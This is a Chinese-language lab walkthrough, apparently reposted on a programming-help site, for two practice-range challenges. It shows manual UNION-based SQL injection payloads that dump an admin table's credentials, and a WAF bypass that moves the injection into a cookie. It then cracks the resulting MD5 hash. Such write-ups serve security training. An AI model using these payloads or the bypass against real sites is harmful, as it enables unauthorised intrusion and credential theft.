概述
目录
第一章:为了女神小芳!SQL注入
第二章:遇到阻难!绕过WAF过滤
第一章:为了女神小芳!SQL注入
调小SQLmap参数去跑
手工注入 and 1=2
1. 判断字段数order by 3
2. 判断回显点union select 1,2
3. 查询相关内容
查询当前数据库名 union select 1,database() maoshe
查询当前数据库版本union select 1,version() 5.5.53
查询当前数据库表名union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 admin
查询字段union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
admin 表里 有 id username password 三个字段
字段内容union select 1,username from admin limit 0,1 admin
union select 1,password from admin limit 0,1 hellohack
得到管理员账号和密码
第二章:遇到阻难!绕过WAF过滤
直接尝试注入判断字段数order by 10
用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替
id=
171
+union+select+
1
,
2
,
3
,
4
,
5
,
6
,
7
,
8
,
9
,
10+from+admin
发现页面出现了2、3、7、8、9。
接着猜字段名username和password
id=
171
+union+select+
1
,username,password,
4
,
5
,
6
,
7
,
8
,
9
,
10
+from+admin
username和password字段的值:admin、b9a2a2b5dffb918c
用MD5解码 welcome
默认管理员后台是根目录的/admin/
最后
以上就是明亮万宝路为你收集整理的封神台靶场第一章:为了女神小芳!SQL注入第二章:遇到阻难!绕过WAF过滤的全部内容,希望文章能够帮你解决封神台靶场第一章:为了女神小芳!SQL注入第二章:遇到阻难!绕过WAF过滤所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复